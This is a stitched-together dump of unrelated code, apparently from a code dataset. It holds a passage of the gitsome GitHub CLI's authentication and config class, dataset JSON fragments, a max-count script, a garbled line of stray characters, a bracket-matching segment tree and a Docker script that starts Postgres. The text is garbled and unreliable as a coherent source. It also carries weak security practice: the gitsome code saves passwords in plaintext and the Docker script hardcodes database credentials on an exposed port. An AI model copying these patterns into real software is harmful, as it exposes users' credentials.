        self.clr_code = 'cyan'
        self.clr_error = 'red'
        self.clr_header = 'yellow'
        self.clr_link = 'green'
        self.clr_list = 'cyan'
        self.clr_message = None
        self.clr_num_comments = 'green'
        self.clr_num_points = 'green'
        self.clr_tag = 'cyan'
        self.clr_time = 'yellow'
        self.clr_title = None
        self.clr_tooltip = None
        self.clr_user = 'cyan'
        self.clr_view_link = 'magenta'
        self.clr_view_index = 'magenta'
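
    # A usage sketch of the overall flow (hypothetical caller; gitsome's
    # actual entry points live outside this file):
    #
    #   config = Config()        # also loads color overrides from disk
    #   config.authenticate()    # cached credentials if present, else prompt
    #   if config.check_auth():
    #       config.save_config()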

    def authenticate_cached_credentials(self, config, parser,
                                        enterprise_auth=enterprise_login):
        """Authenticate with the user's credentials in ~/.gitsomeconfig.

        :type config: str
        :param config: The config path.

        :type parser: :class:`ConfigParser.RawConfigParser`
        :param parser: An instance of `ConfigParser.RawConfigParser`.
        """
        with open(config) as config_file:
            try:
                parser.read_file(config_file)
            except AttributeError:
                parser.readfp(config_file)
            self.user_login = self.load_config(
                parser=parser,
                cfg_label=self.CONFIG_USER_LOGIN)
            self.user_pass = self.load_config(
                parser=parser,
                cfg_label=self.CONFIG_USER_PASS)
            self.user_token = self.load_config(
                parser=parser,
                cfg_label=self.CONFIG_USER_TOKEN)
            self.enterprise_url = self.load_config(
                parser=parser,
                cfg_label=self.CONFIG_ENTERPRISE_URL)
            self.verify_ssl = self.load_config(
                parser=parser,
                cfg_label=self.CONFIG_VERIFY_SSL,
                boolean_config=True)
            self.user_feed = self.load_config(
                parser=parser,
                cfg_label=self.CONFIG_USER_FEED)
            if not self.verify_ssl:
                # The user has chosen not to verify SSL certs.
                # Disable warnings related to this option.
                requests.packages.urllib3.disable_warnings(
                    InsecureRequestWarning)
            login_kwargs = {
                'username': self.user_login,
                'two_factor_callback': self.request_two_factor_code,
            }
            if self.enterprise_url is not None:
                self.login = enterprise_auth
                login_kwargs.update({
                    'url': self.enterprise_url,
                    'verify': self.verify_ssl,
                })
                if self.user_token is not None:
                    login_kwargs.update({'token': self.user_token})
                elif self.user_pass is not None:
                    login_kwargs.update({'password': self.user_pass})
                else:
                    self.print_auth_error()
                    return
            else:
                login_kwargs.update({'token': self.user_token})
            self.api = self.login(**login_kwargs)
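
    # For reference, the non-Enterprise path above reduces to a call like
    # the following (a sketch, assuming the bundled github3 login helper):
    #
    #   api = login(username=self.user_login,
    #               token=self.user_token,
    #               two_factor_callback=self.request_two_factor_code)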

    def authenticate(self, enterprise=False,
                     enterprise_auth=enterprise_login, overwrite=False):
        """Log into GitHub.

        Adapted from https://github.com/sigmavirus24/github-cli.

        :type enterprise: bool
        :param enterprise: Determines whether to configure GitHub Enterprise.
            Default: False.

        :type overwrite: bool
        :param overwrite: Indicates whether we want to overwrite the current
            set of credentials.  Default: False.
        """
        if self.api is not None and not overwrite:
            return
        # Get the full path to the configuration file.
        config = self.get_github_config_path(self.CONFIG)
        parser = configparser.RawConfigParser()
        # Check to make sure the file exists and we are allowed to read it.
        # Skip if we want to overwrite the auth settings.
        if os.path.isfile(config) and \
                os.access(config, os.R_OK | os.W_OK) and not overwrite:
            with open(config) as config_file:
                try:
                    parser.read_file(config_file)
                except AttributeError:
                    parser.readfp(config_file)
                self.authenticate_cached_credentials(config, parser)
        else:
            # The file didn't exist or we don't have the correct permissions.
            login_kwargs = {
                'two_factor_callback': self.request_two_factor_code,
            }
            if enterprise:
                self.login = enterprise_auth
                while not self.enterprise_url:
                    self.enterprise_url = input('Enterprise URL: ')
                if click.confirm('Do you want to verify SSL certs?',
                                 default=True):
                    self.verify_ssl = True
                else:
                    self.verify_ssl = False
                login_kwargs.update({
                    'url': self.enterprise_url,
                    'verify': self.verify_ssl,
                })
            while not self.user_login:
                self.user_login = input('User Login: ')
            login_kwargs.update({'username': self.user_login})
            if click.confirm(('Do you want to log in with a password [Y] or '
                              'a personal access token [n]?'),
                             default=True):
                user_pass = None
                while not user_pass:
                    user_pass = self.getpass('Password: ')
                login_kwargs.update({'password': user_pass})
                try:
                    if not enterprise:
                        # Trade the user password for a personal access token.
                        # This does not seem to be available for Enterprise.
                        auth = self.authorize(
                            self.user_login,
                            user_pass,
                            scopes=['user', 'repo'],
                            note='gitsome',
                            note_url='https://github.com/donnemartin/gitsome',
                            two_factor_callback=self.request_two_factor_code
                        )
                        self.user_token = auth.token
                    else:
                        self.user_pass = user_pass
                except (UnprocessableEntity, AuthenticationFailed):
                    click.secho('Error creating token.',
                                fg=self.clr_error)
                    click.secho(('Visit the following page and verify you do '
                                 'not have an existing token named '
                                 '"gitsome":\n'
                                 '  https://github.com/settings/tokens\n'
                                 'If a token already exists, update your '
                                 '~/.gitsomeconfig file with your token:\n'
                                 '  user_token = TOKEN\n'
                                 'You can also generate a new token.'),
                                fg=self.clr_message)
                    self.print_auth_error()
                    return
            else:
                # The user has chosen to authenticate with a token.
                while not self.user_token:
                    self.user_token = input('Token: ')
                login_kwargs.update({'token': self.user_token})
            self.api = self.login(**login_kwargs)
            if self.user_feed:
                parser.set(self.CONFIG_SECTION,
                           self.CONFIG_USER_FEED,
                           self.user_feed)
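
    # The password-for-token exchange above targets GitHub's OAuth
    # Authorizations API, which has since been removed from github.com;
    # a hypothetical raw-HTTP equivalent would look roughly like:
    #
    #   curl -u USER https://api.github.com/authorizations \
    #        -d '{"scopes": ["user", "repo"], "note": "gitsome"}'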
The ratelimit_remaining api does not\n seem to be available for GitHub Enterprise.\n\n github3.py's method check_authorization seems to only work given\n an authorization created by a registered application.\n\n TODO: Determine a better way to check the authorization for\n GitHub Enterprise.\n\n :type enterprise: bool\n :param enterprise: Determines whether we are authenticating with\n GitHub Enterprise.\n \"\"\"\n if self.enterprise_url is not None:\n return True\n try:\n if self.api is not None:\n # Throws AuthenticationFailed if invalid credentials but\n # does not deduct from the rate limit.\n self.api.ratelimit_remaining\n return True\n else:\n self.print_auth_error()\n except AuthenticationFailed:\n self.print_auth_error()\n return False\n\n def get_github_config_path(self, config_file_name):\n \"\"\"Attempt to find the github config file.\n\n Adapted from https://github.com/sigmavirus24/github-cli.\n\n :type config_file_name: str\n :param config_file_name: The config file name.\n\n :rtype: str\n :return: The github config file path.\n \"\"\"\n home = os.path.abspath(os.environ.get('HOME', ''))\n config_file_path = os.path.join(home, config_file_name)\n return config_file_path\n\n def load_config(self, parser, cfg_label, default=None,\n color_config=False, boolean_config=False):\n \"\"\"Load the specified config from ~/.gitsomeconfig.\n\n :type parser: :class:`ConfigParser.RawConfigParser`\n :param parser: An instance of `ConfigParser.RawConfigParser`.\n\n :type cfg_label: str\n :param cfg_label: The config label to load.\n\n :type default: str\n :param default: The default color if no color config exists.\n Default: None.\n\n :type color_config: bool\n :param color_config: Determines whether this is a color config.\n Default: False.\n\n :type boolean_config: bool\n :param boolean_config: Determines whether to load a boolean config.\n Default: False.\n \"\"\"\n try:\n if boolean_config:\n cfg = parser.getboolean(self.CONFIG_SECTION, cfg_label)\n else:\n cfg = parser.get(self.CONFIG_SECTION, cfg_label)\n if color_config:\n if cfg == 'none':\n cfg = None\n # Check if the user input a valid color.\n # If invalid, this will throw a TypeError\n click.style('', fg=cfg)\n except (TypeError, configparser.NoOptionError):\n return default\n return cfg\n\n def load_configs(self, config_funcs):\n \"\"\"Load the specified config from ~/.gitsomeconfig.\n\n :type foo: list\n :param foo: The config methods to run.\n \"\"\"\n config_file_path = self.get_github_config_path(self.CONFIG)\n parser = configparser.RawConfigParser()\n try:\n with open(config_file_path) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n for config_func in config_funcs:\n config_func(parser)\n except IOError:\n # There might not be a cache yet, just silently return.\n return None\n\n def load_config_colors(self, parser):\n \"\"\"Load the color config from ~/.gitsomeconfig.\n\n :type parser: :class:`ConfigParser.RawConfigParser`\n :param parser: An instance of `ConfigParser.RawConfigParser`.\n \"\"\"\n self.load_colors(parser)\n\n def load_colors(self, parser):\n \"\"\"Load all colors from ~/.gitsomeconfig.\n\n :type parser: :class:`ConfigParser.RawConfigParser`\n :param parser: An instance of `ConfigParser.RawConfigParser`.\n \"\"\"\n self.clr_primary = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_PRIMARY,\n default=self.clr_primary,\n color_config=True)\n self.clr_secondary = self.load_config(\n parser=parser,\n 
cfg_label=self.CONFIG_CLR_SECONDARY,\n default=self.clr_secondary,\n color_config=True)\n self.clr_tertiary = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_TERTIARY,\n default=self.clr_tertiary,\n color_config=True)\n self.clr_quaternary = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_QUATERNARY,\n default=self.clr_quaternary,\n color_config=True)\n self.clr_bold = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_BOLD,\n default=self.clr_bold,\n color_config=True)\n self.clr_code = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_CODE,\n default=self.clr_code,\n color_config=True)\n self.clr_code = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_ERROR,\n default=self.clr_code,\n color_config=True)\n self.clr_header = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_HEADER,\n default=self.clr_header,\n color_config=True)\n self.clr_link = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_LINK,\n default=self.clr_link,\n color_config=True)\n self.clr_list = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_LIST,\n default=self.clr_list,\n color_config=True)\n self.clr_message = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_MESSAGE,\n default=self.clr_message,\n color_config=True)\n self.clr_num_comments = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_NUM_COMMENTS,\n default=self.clr_num_comments,\n color_config=True)\n self.clr_num_points = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_NUM_POINTS,\n default=self.clr_num_points,\n color_config=True)\n self.clr_tag = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_TAG,\n default=self.clr_tag,\n color_config=True)\n self.clr_time = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_TIME,\n default=self.clr_time,\n color_config=True)\n self.clr_title = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_TITLE,\n default=self.clr_title,\n color_config=True)\n self.clr_tooltip = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_TOOLTIP,\n default=self.clr_tooltip,\n color_config=True)\n self.clr_user = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_USER,\n default=self.clr_user,\n color_config=True)\n self.clr_view_link = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_VIEW_LINK,\n default=self.clr_view_link,\n color_config=True)\n self.clr_view_index = self.load_config(\n parser=parser,\n cfg_label=self.CONFIG_CLR_VIEW_INDEX,\n default=self.clr_view_index,\n color_config=True)\n\n def load_urls(self, view_in_browser):\n \"\"\"Load the current set of urls from ~/.gitsomeconfigurl.\n\n :type view_in_browser: bool\n :param view_in_browser: Determines whether to view the urls in a\n browser.\n\n :rtype: list\n :return: Collection of urls.\n \"\"\"\n config = self.get_github_config_path(self.CONFIG_URL)\n parser = configparser.RawConfigParser()\n with open(config) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n urls = parser.get(self.CONFIG_URL_SECTION,\n self.CONFIG_URL_LIST)\n urls = urls.strip()\n excludes = ['[', ']', \"'\"]\n for exclude in excludes:\n urls = urls.replace(exclude, '')\n if not view_in_browser:\n urls = urls.replace('https://github.com/', '')\n return urls.split(', ')\n\n def print_auth_error(self):\n \"\"\"Print a message the authorization has failed.\"\"\"\n click.secho('Authentication error.', fg=self.clr_error)\n 
click.secho(('Update your credentials in ~/.gitsomeconfig '\n 'or run:\\n gh configure'),\n fg=self.clr_message)\n\n def prompt_news_feed(self):\n \"\"\"Prompt the user to enter a news feed url.\"\"\"\n if click.confirm(('No feed url detected.\\n Calling gh events without '\n \"an argument\\n displays the logged in user's \"\n 'news feed.\\nDo you want gitsome to track your '\n 'news feed?'),\n default=True):\n click.secho(('Visit the following url while logged into GitHub:\\n'\n ' https://github.com\\n'\n 'Enter the url found under \"Subscribe to your '\n 'news feed\".'),\n fg=self.clr_message)\n self.user_feed = ''\n while not self.user_feed:\n self.user_feed = input('URL: ')\n\n def request_two_factor_code(self):\n \"\"\"Request two factor authentication code.\n\n Callback if two factor authentication is requested.\n\n :rtype: str\n :return: The user input two factor authentication code.\n \"\"\"\n code = ''\n while not code:\n code = input('Enter 2FA code: ')\n return code\n\n def save_config(self):\n \"\"\"Saves the config to ~/.gitsomeconfig.\"\"\"\n if self.check_auth():\n config = self.get_github_config_path(self.CONFIG)\n parser = configparser.RawConfigParser()\n parser.add_section(self.CONFIG_SECTION)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_USER_LOGIN,\n self.user_login)\n if self.user_token is not None:\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_USER_TOKEN,\n self.user_token)\n if self.user_feed is not None:\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_USER_FEED,\n self.user_feed)\n if self.enterprise_url is not None:\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_ENTERPRISE_URL,\n self.enterprise_url)\n if self.user_pass is not None:\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_USER_PASS,\n self.user_pass)\n else:\n parser.remove_option(self.CONFIG_SECTION,\n self.CONFIG_USER_PASS)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_VERIFY_SSL,\n self.verify_ssl)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_PRIMARY,\n self.clr_primary)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_SECONDARY,\n self.clr_secondary)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_TERTIARY,\n self.clr_tertiary)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_QUATERNARY,\n self.clr_quaternary)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_BOLD,\n self.clr_bold)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_CODE,\n self.clr_code)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_ERROR,\n self.clr_error)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_HEADER,\n self.clr_header)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_LINK,\n self.clr_link)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_LIST,\n self.clr_list)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_MESSAGE,\n self.clr_message)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_NUM_COMMENTS,\n self.clr_num_comments)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_NUM_POINTS,\n self.clr_num_points)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_TAG,\n self.clr_tag)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_TIME,\n self.clr_time)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_TITLE,\n self.clr_title)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_TOOLTIP,\n self.clr_tooltip)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_USER,\n self.clr_user)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_VIEW_LINK,\n self.clr_view_link)\n parser.set(self.CONFIG_SECTION,\n self.CONFIG_CLR_VIEW_INDEX,\n self.clr_view_index)\n with open(config, 'w+') 
as config_file:\n parser.write(config_file)\n\n def save_urls(self):\n \"\"\"Save the current set of urls to ~/.gitsomeconfigurl.\"\"\"\n config = self.get_github_config_path(self.CONFIG_URL)\n parser = configparser.RawConfigParser()\n try:\n parser.add_section(self.CONFIG_URL_SECTION)\n except configparser.DuplicateSectionError:\n pass\n parser.set(self.CONFIG_URL_SECTION, self.CONFIG_URL_LIST, self.urls)\n with open(config, 'w+') as config_file:\n parser.write(config_file)\n\n def show_bash_completions_info(self):\n \"\"\"Show info on how to enable bash completions\"\"\"\n click.secho(('By default, gitsome looks at the following locations '\n 'to enable bash completions:\\n'\n ' https://github.com/donnemartin/gitsome/blob/master/xonsh/environ.py#L123-L130\\n' # NOQA\n 'If bash completions are not working for you, check out '\n 'the following link:\\n'\n ' https://github.com/donnemartin/gitsome#enabling-bash-completions'), # NOQA\n fg=self.clr_message)\n", "step-ids": [ 13, 15, 16, 18, 22 ] }
[ 13, 15, 16, 18, 22 ]
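The gitsome record above repeatedly guards parser.read_file with an AttributeError fallback to readfp, the only name Python 2's ConfigParser offered. A minimal standalone sketch of that compatibility shim (the path and function name here are illustrative, not taken from the record):

import configparser

def read_config(path):
    # Prefer the modern read_file API; fall back to the legacy readfp
    # alias when read_file is unavailable (Python 2-era parsers).
    parser = configparser.RawConfigParser()
    with open(path) as config_file:
        try:
            parser.read_file(config_file)
        except AttributeError:
            parser.readfp(config_file)
    return parser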
# Read integers from stdin until a 0 sentinel and report how many
# times the running maximum occurs among the values read.
count = 0
maximum = -1
m = -1
while m != 0:
    m = int(input())
    if m > maximum:
        maximum = m
        count = 1
    elif m == maximum:
        count += 1
print(count)
normal
{ "blob_id": "0e1ea8c7fba90c1b5d18eaa399b91f237d4defee", "index": 2568, "step-1": "<mask token>\n", "step-2": "<mask token>\nwhile m != 0:\n m = int(input())\n if m > maximum:\n maximum = m\n count = 1\n elif m == maximum:\n count += 1\nprint(count)\n", "step-3": "count = 0\nmaximum = -1\nm = -1\nwhile m != 0:\n m = int(input())\n if m > maximum:\n maximum = m\n count = 1\n elif m == maximum:\n count += 1\nprint(count)\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
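A quick non-streaming sanity check for the record above (the sample values are illustrative):

values = [3, 7, 2, 7, 5]
print(values.count(max(values)))  # prints 2: the maximum 7 occurs twice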
5 1 6 1x 1112#Desember@@@@@
normal
{ "blob_id": "b324c520400f04719b17121b0b4c2d23915e8841", "index": 2666, "step-1": "5 1\r\n6 1x\r\n1112#Desember@@@@@", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from math import ceil, log2

# Segment tree over a bracket string. Each node stores a triple for its range:
# (matched pairs, unmatched '(' count, unmatched ')' count). Two children merge
# by pairing the left child's surplus '(' with the right child's surplus ')'.

def constructST(s, start, end, st, i):
    if start == end:
        st[i] = 0
        openst[i] = 1 if s[start] == '(' else 0
        closedst[i] = 1 if s[start] == ')' else 0
        return st[i], openst[i], closedst[i]
    else:
        mid = (start + end) // 2
        st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 * i + 1)
        a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)
        # pair leftover '(' from the left child with leftover ')' from the right
        tmp = min(openst[2 * i + 1], closedst[2 * i + 2])
        st[i] += tmp + a
        openst[i] += b - tmp
        closedst[i] += c - tmp
        return st[i], openst[i], closedst[i]

def query(s, start, end, l, r, st, i):
    if l > end or r < start:
        return 0, 0, 0
    elif start >= l and end <= r:
        return st[i], openst[i], closedst[i]
    else:
        mid = (start + end) // 2
        a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)
        d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)
        tmp = min(b, f)
        T = a + d + tmp
        O = b + e - tmp
        C = c + f - tmp
    return T, O, C

s = input()
n = len(s)
x = int(ceil(log2(n)))
max_size = 2 * pow(2, x) - 1

st = [0 for i in range(0, max_size)]
openst = [0 for i in range(0, max_size)]
closedst = [0 for i in range(0, max_size)]

constructST(s, 0, n - 1, st, 0)
# print(st)
# print(openst)
# print(closedst)
for _ in range(int(input())):
    l, r = map(int, input().split())
    # each matched pair contributes two characters to the answer
    print(2 * query(s, 0, n - 1, l - 1, r - 1, st, 0)[0])
normal
{ "blob_id": "ccc74f58eff3bb00f0be8c2c963de4208b7f0933", "index": 9125, "step-1": "<mask token>\n\n\ndef constructST(s, start, end, st, i):\n if start == end:\n st[i] = 0\n openst[i] = 1 if s[start] == '(' else 0\n closedst[i] = 1 if s[start] == ')' else 0\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *\n i + 1)\n a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)\n tmp = min(openst[2 * i + 1], closedst[2 * i + 2])\n st[i] += tmp + a\n openst[i] += b - tmp\n closedst[i] += c - tmp\n return st[i], openst[i], closedst[i]\n\n\ndef query(s, start, end, l, r, st, i):\n if l > end or r < start:\n return 0, 0, 0\n elif start >= l and end <= r:\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)\n d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)\n tmp = min(b, f)\n T = a + d + tmp\n O = b + e - tmp\n C = c + f - tmp\n return T, O, C\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef constructST(s, start, end, st, i):\n if start == end:\n st[i] = 0\n openst[i] = 1 if s[start] == '(' else 0\n closedst[i] = 1 if s[start] == ')' else 0\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *\n i + 1)\n a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)\n tmp = min(openst[2 * i + 1], closedst[2 * i + 2])\n st[i] += tmp + a\n openst[i] += b - tmp\n closedst[i] += c - tmp\n return st[i], openst[i], closedst[i]\n\n\ndef query(s, start, end, l, r, st, i):\n if l > end or r < start:\n return 0, 0, 0\n elif start >= l and end <= r:\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)\n d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)\n tmp = min(b, f)\n T = a + d + tmp\n O = b + e - tmp\n C = c + f - tmp\n return T, O, C\n\n\n<mask token>\nconstructST(s, 0, n - 1, st, 0)\nfor _ in range(int(input())):\n l, r = map(int, input().split())\n print(2 * query(s, 0, n - 1, l - 1, r - 1, st, 0)[0])\n", "step-3": "<mask token>\n\n\ndef constructST(s, start, end, st, i):\n if start == end:\n st[i] = 0\n openst[i] = 1 if s[start] == '(' else 0\n closedst[i] = 1 if s[start] == ')' else 0\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *\n i + 1)\n a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)\n tmp = min(openst[2 * i + 1], closedst[2 * i + 2])\n st[i] += tmp + a\n openst[i] += b - tmp\n closedst[i] += c - tmp\n return st[i], openst[i], closedst[i]\n\n\ndef query(s, start, end, l, r, st, i):\n if l > end or r < start:\n return 0, 0, 0\n elif start >= l and end <= r:\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)\n d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)\n tmp = min(b, f)\n T = a + d + tmp\n O = b + e - tmp\n C = c + f - tmp\n return T, O, C\n\n\ns = input()\nn = len(s)\nx = int(ceil(log2(n)))\nmax_size = 2 * pow(2, x) - 1\nst = [(0) for i in range(0, max_size)]\nopenst = [(0) for i in range(0, max_size)]\nclosedst = [(0) for i in range(0, max_size)]\nconstructST(s, 0, n - 1, st, 0)\nfor _ in range(int(input())):\n l, r = map(int, input().split())\n print(2 * query(s, 0, n - 1, l - 1, r - 1, st, 0)[0])\n", "step-4": "from math import ceil, log2, sqrt\n\n\ndef constructST(s, start, 
end, st, i):\n if start == end:\n st[i] = 0\n openst[i] = 1 if s[start] == '(' else 0\n closedst[i] = 1 if s[start] == ')' else 0\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n st[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2 *\n i + 1)\n a, b, c = constructST(s, mid + 1, end, st, 2 * i + 2)\n tmp = min(openst[2 * i + 1], closedst[2 * i + 2])\n st[i] += tmp + a\n openst[i] += b - tmp\n closedst[i] += c - tmp\n return st[i], openst[i], closedst[i]\n\n\ndef query(s, start, end, l, r, st, i):\n if l > end or r < start:\n return 0, 0, 0\n elif start >= l and end <= r:\n return st[i], openst[i], closedst[i]\n else:\n mid = (start + end) // 2\n a, b, c = query(s, start, mid, l, r, st, 2 * i + 1)\n d, e, f = query(s, mid + 1, end, l, r, st, 2 * i + 2)\n tmp = min(b, f)\n T = a + d + tmp\n O = b + e - tmp\n C = c + f - tmp\n return T, O, C\n\n\ns = input()\nn = len(s)\nx = int(ceil(log2(n)))\nmax_size = 2 * pow(2, x) - 1\nst = [(0) for i in range(0, max_size)]\nopenst = [(0) for i in range(0, max_size)]\nclosedst = [(0) for i in range(0, max_size)]\nconstructST(s, 0, n - 1, st, 0)\nfor _ in range(int(input())):\n l, r = map(int, input().split())\n print(2 * query(s, 0, n - 1, l - 1, r - 1, st, 0)[0])\n", "step-5": "from math import ceil, log2, sqrt\r\n\r\ndef constructST(s, start, end, st, i):\r\n\tif start == end:\r\n\t\tst[i] = 0\r\n\t\topenst[i] = 1 if s[start] == '(' else 0\r\n\t\tclosedst[i] = 1 if s[start] == ')' else 0\r\n\t\treturn st[i], openst[i], closedst[i]\r\n\r\n\telse:\r\n\t\tmid = (start+end)//2\r\n\t\tst[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2*i+1) \r\n\t\ta, b, c = constructST(s, mid+1, end, st, 2*i+2)\r\n\t\ttmp = min(openst[2*i+1], closedst[2*i+2])\r\n\t\tst[i] += tmp + a\r\n\t\topenst[i] += b-tmp\r\n\t\tclosedst[i] += c -tmp\r\n\r\n\t\treturn st[i], openst[i], closedst[i]\r\n\r\ndef query(s, start, end, l, r, st, i):\r\n\tif l > end or r < start:\r\n\t\treturn 0, 0, 0\r\n\telif start >= l and end <= r:\r\n\t\treturn st[i], openst[i], closedst[i]\r\n\telse:\r\n\t\tmid = (start + end)//2\r\n\t\ta, b, c = query(s, start, mid, l, r, st, 2*i+1) \r\n\t\td, e, f = query(s, mid+1, end, l, r, st, 2*i+2)\r\n\t\ttmp = min(b, f)\r\n\t\tT = a+d +tmp\r\n\t\tO = b+e - tmp\r\n\t\tC = c+f - tmp\r\n\treturn T, O, C\r\n\r\n\r\n\r\ns = input()\r\nn = len(s)\r\nx = int(ceil(log2(n)))\r\nmax_size = 2*pow(2, x) -1\t\r\n\r\nst = [0 for i in range(0, max_size)]\r\nopenst = [0 for i in range(0, max_size)]\r\nclosedst = [0 for i in range(0, max_size)]\r\n\r\nconstructST(s, 0, n-1, st, 0)\r\n# print(st)\r\n# print(openst)\r\n# print(closedst)\r\nfor _ in range(int(input())):\r\n\tl, r = map(int, input().split())\r\n\tprint(2*query(s, 0, n-1, l-1, r-1, st, 0)[0])\r\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
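The merge rule in the segment-tree record above pairs the left child's surplus '(' with the right child's surplus ')'. A tiny worked check of that rule (the two halves are illustrative):

left = (1, 1, 0)    # "(()"  -> 1 matched pair, 1 unmatched '(', 0 unmatched ')'
right = (0, 1, 2)   # "))("  -> 0 matched pairs, 1 unmatched '(', 2 unmatched ')'
pairs = min(left[1], right[2])  # new pairs formed across the boundary
merged = (left[0] + right[0] + pairs,
          left[1] + right[1] - pairs,
          left[2] + right[2] - pairs)
print(merged)  # (2, 1, 1), matching a direct scan of "(()))("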
import docker
import logging
import sys

if __name__ == '__main__':

    # setting up logger
    logging.basicConfig(stream=sys.stdout,
                        format='[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s',
                        level=logging.DEBUG)

    # get the docker client
    client = docker.from_env()

    # list out docker volumes
    logging.info(str([x.name for x in client.volumes.list()]))

    # Create the airflow backend volume if it does not exist yet
    if 'airflow_pg_data' not in [x.name for x in client.volumes.list()]:
        client.volumes.create('airflow_pg_data')

    # only launch the backend if the container is not already running
    # (note: containers.list() returns only running containers by default)
    logging.info(str([x.name for x in client.containers.list()]))
    if 'airflow_pg' not in [x.name for x in client.containers.list()]:

        # launch postgres backend
        pg = client.containers.run(image='postgres',
                                   name='airflow_pg',
                                   auto_remove=True,
                                   detach=True,
                                   environment={
                                       'POSTGRES_PASSWORD': 'airflow',
                                       'POSTGRES_USER': 'airflow',
                                       'PGDATA': '/airflow/data'
                                   },
                                   volumes={'airflow_pg_data': {'bind': '/airflow/data', 'mode': 'rw'}},
                                   ports={'5432/tcp': 5432}
                                   )
normal
